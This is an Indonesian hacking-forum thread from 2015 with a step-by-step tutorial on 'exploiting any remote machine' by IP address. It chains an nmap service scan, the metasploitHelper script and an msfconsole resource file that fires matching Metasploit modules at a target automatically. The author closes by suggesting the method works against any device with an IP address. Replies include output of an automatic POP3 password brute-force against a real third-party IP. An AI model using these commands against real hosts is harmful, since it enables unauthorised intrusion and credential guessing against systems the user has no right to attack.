[Share] Exploit Any Remote Machine Use Metasploit & Nmap
#1
Kali ini saya coba buatkan tutorial "Exploit remote machine via IP addres"

Disini kita akan menggunakan dua buah perlengkapan tempur, yaitu NMAP & Metasploit. Kalau di lihat - lihat cara kerja tehnik ini mirip dengan fitur Hail Mary pada armitage , dimana module metasploit akan di coba satu persatu pada target. jika itu vunl maka akan tereksekusi.

Required :

   pip install python-libnmap
   git clone https://github.com/milo2012/metasploitHelper.git

Baik .... langsung saja , langkah pertama adalah dengan melakukan scanning menggunakan NMAP. Pada tutorial ini saya menggunakan target web saya sendiri : indonesianbackboxteam.com

   root@Black-Ink:~# nmap -sV -oX /root/Desktop/result.xml 64.37.52.189

Dari hasil scanning maka akan muncul file result.xml di dekstop, file inilah yg kita butuhkan untuk melanjutkan ke tahap selanjutnya.

Spoiler! :
[Image: Screenshot_from_2015_12_21_13_58_39.png]

Langkah selanjutnya silahkan clone metasploit helper dari link yg tertera di atas, kemudian edit file metasploitHelper.py pada bagian yang saya tandai di gambar, kok di edit ? yap .. karna path pada script tersebut kalo saya g salah merupakan path module metasploit di backtrack , sedangkan di kali linux 2.0 lokasi pathnya ada di : /usr/share/metasploit-framework/modules/ . intinya sesuaikan path tersebut dengan path module metasploit di masing - masing OS. jangan lupa di save.

Spoiler! :
[Image: Screenshot_from_2015_12_21_14_15_38.png]

selanjutnya cd ke folder metasploitHelper. untuk melihat opsi yang tersedia gunakan comand :

root@Black-Ink:~/Desktop/metasploitHelper# python metasploitHelper.py -h

ntar munculnya begindang :

Spoiler! :
[Image: Screenshot_from_2015_12_21_14_25_35.png]

oke .. lanjut ke step selanjutnya dimana kita akan melakukan pengujian, berpedoman pada options yang tadi sudah kita lihat, maka untuk melakukan pengujian saya memasukkan comand :

root@Black-Ink:~/Desktop/metasploitHelper# python metasploitHelper.py -i /root/Desktop/result.xml

Spoiler! :
[Image: Screenshot_from_2015_12_21_14_36_11.png]

nah ... yang di bagian ini nih yg butuh kesabaran, karna biasanya lumayan lama nunggu prosesnya ...
langkah selanjutnya kita jalankan metasploit dengan menambahkan -r runAux.rc

apa itu runAux.rc ?
ntu merupakan list auxiliary yg bakal di cobain atu2, tapi berhubung d script ini sudah di set sedemikian rupa jadi tinggal masukkan comand sekali langsung jalan semua. Comandnya gimana ? yo mbok sabar toh yo , tak nyalain roko dulu :3

Asap rokok udah ngepul lanjutin tutorialnya Big Grin

comand untuk menjalannkan nya  :

root@Black-Ink:~/Desktop/metasploitHelper# msfconsole -r runAux.rc

tungguin dah tu proses kelar , kalau ntu target terdapat vuln, i think u know what must u do Big Grin

Ok ... demikian sharing kali ini, semoga bisa bermanfaat ....
Cara ini bisa dikembangkan lagi untuk melakukan exploitasi ke segala jenis barang yg punya IP addres Big Grin
salam Black-Ink

Jika ada yg kurang mengerti silahkan bertanya , jika ada yg kurang mohon tambahkan , jika ada salah mohon maafkan
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#2
setelah saya lakukan percobaan pada website saya, ternyata hasilnya nihil .... alias belum ketemu vulnnya via module metasploit .... bukan berarti tidak ada vuln, tp saya hanya berusaha semaksimal mungkin untuk mengamankan web saya sendiri dengan beberapa settingan di CP nya Big Grin
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#3
mau tanya nih kang

result.xml nya dapat dari mana ya ???

#4
(12-21-2015, 11:07 PM)chuck3y Wrote: mau tanya nih kang

result.xml nya dapat dari mana ya ???

Hayuk kang di baca lebih teliti lagi , jangan suka baca lompat ntar kcebur lobang loh :v

Result.xml di dapet dari proses scanning Nmap :

root@Black-Ink:~# nmap -sV -oX /root/Desktop/result.xml 64.37.52.189

kan sudah ada di atas Big Grin
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#5
root@kali~#  python metasploitHelper.py -h
Traceback (most recent call last):
  File "metasploitHelper.py", line 8, in <module>
    from libnmap.parser import NmapParser
ImportError: No module named libnmap.parser

itu kenapa ya bro, padahal python-libnmap udah diinstall

eh udah solved bro Smile ane salah nginstall python-libnmap malah di python3.4, terus ane eksekusi metasploithelper.py pake python27 jadi gak bisa
hehe Big Grin
~> The quieter you become, to more you able to hear <~

#6
(12-22-2015, 12:52 AM)x_code Wrote:
(12-21-2015, 11:07 PM)chuck3y Wrote: mau tanya nih kang

result.xml nya dapat dari mana ya ???

Hayuk kang di baca lebih teliti lagi , jangan suka baca lompat ntar kcebur lobang loh :v

Result.xml di dapet dari proses scanning Nmap :

root@Black-Ink:~# nmap -sV -oX /root/Desktop/result.xml 64.37.52.189

kan sudah ada di atas Big Grin


Carbelius@MyHeart:~# nmap -sV -oX [spasi] /root/Desktop.hasil.xml [spasi] [target]
-sV = Scan Open terbuka berserta service version,info
-oX = output, 
#CMIW

Buat TS nice share, aku blom ada waktu untuk coba ^_^
ditunggu next thread nya say
Klik Here

Clound@IBTeam:~#
EMail Me : [email protected]

#7
wah niceee thread om Big Grin boleh di coba nih

#8
(12-23-2015, 04:16 AM)Clound_Carbelius Wrote:
(12-22-2015, 12:52 AM)x_code Wrote:
(12-21-2015, 11:07 PM)chuck3y Wrote: mau tanya nih kang

result.xml nya dapat dari mana ya ???

Hayuk kang di baca lebih teliti lagi , jangan suka baca lompat ntar kcebur lobang loh :v

Result.xml di dapet dari proses scanning Nmap :

root@Black-Ink:~# nmap -sV -oX /root/Desktop/result.xml 64.37.52.189

kan sudah ada di atas Big Grin


Carbelius@MyHeart:~# nmap -sV -oX [spasi] /root/Desktop.hasil.xml [spasi] [target]
-sV = Scan Open terbuka berserta service version,info
-oX = output, 
#CMIW

Buat TS nice share, aku blom ada waktu untuk coba ^_^
ditunggu next thread nya say

Thank Q penjelasannya kang Big Grin
emang susah dah kalo jadi orang sibuk :v

(12-23-2015, 04:04 PM)teh manis Wrote: wah niceee thread om Big Grin boleh di coba nih

Hayuk monggo kang ... keburu kehabisan ...
Loh dikira dagangan Big Grin
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile

#9
lah bro malah auto bruteforce pas udah jalanin msfconsole -r runAux.rc :v padahal ga ada wordlist loh

ini potongan yg terakhir nya
resource (runAux.rc)> set RPORT 110
RPORT => 110
resource (runAux.rc)> exploit
[-] 184.107.26.77:110 POP3 - Failed: ':123456', '-ERR [AUTH] Authentication failed.'
[!] No active DB -- Credential data will not be saved!
[-] 184.107.26.77:110 POP3 - Failed: ':12345', '-ERR [AUTH] Authentication failed.'
[-] 184.107.26.77:110 POP3 - Failed: ':123456789', '-ERR [AUTH] Authentication failed.'
[-] 184.107.26.77:110 POP3 - Failed: ':password', ''
[-] 184.107.26.77:110 POP3 - Failed: ':iloveyou', ''
[-] 184.107.26.77:110 POP3 - Failed: ':princess', ''
[-] 184.107.26.77:110 POP3 - Failed: ':1234567', ''
[-] 184.107.26.77:110 POP3 - Failed: ':12345678', ''

#10
(12-27-2015, 02:02 PM)c3budiman Wrote: lah bro malah auto bruteforce pas udah jalanin msfconsole -r runAux.rc :v padahal ga ada wordlist loh

ini potongan yg terakhir nya
resource (runAux.rc)> set RPORT 110
RPORT => 110
resource (runAux.rc)> exploit
[-] 184.107.26.77:110 POP3 - Failed: ':123456', '-ERR [AUTH] Authentication failed.'
[!] No active DB -- Credential data will not be saved!
[-] 184.107.26.77:110 POP3 - Failed: ':12345', '-ERR [AUTH] Authentication failed.'
[-] 184.107.26.77:110 POP3 - Failed: ':123456789', '-ERR [AUTH] Authentication failed.'
[-] 184.107.26.77:110 POP3 - Failed: ':password', ''
[-] 184.107.26.77:110 POP3 - Failed: ':iloveyou', ''
[-] 184.107.26.77:110 POP3 - Failed: ':princess', ''
[-] 184.107.26.77:110 POP3 - Failed: ':1234567', ''
[-] 184.107.26.77:110 POP3 - Failed: ':12345678', ''

Coba liat yang sebelum itu kang, itu yang di jalanin auxiliary apa ...
Untuk wordlistnya sistemnya sama kayak auxiliary nya .. jadi otomatis menggunakan wordlist yang memang sudah incluede di kali linux .... lupa ane path wordlistnye dmn..
kan sama kayak hash di SQLMAP ...
Aku mah apa atuh ... cuma debu - debu mutiara , meskipun debu namun tetap berharga Smile






Users browsing this thread: 1 Guest(s)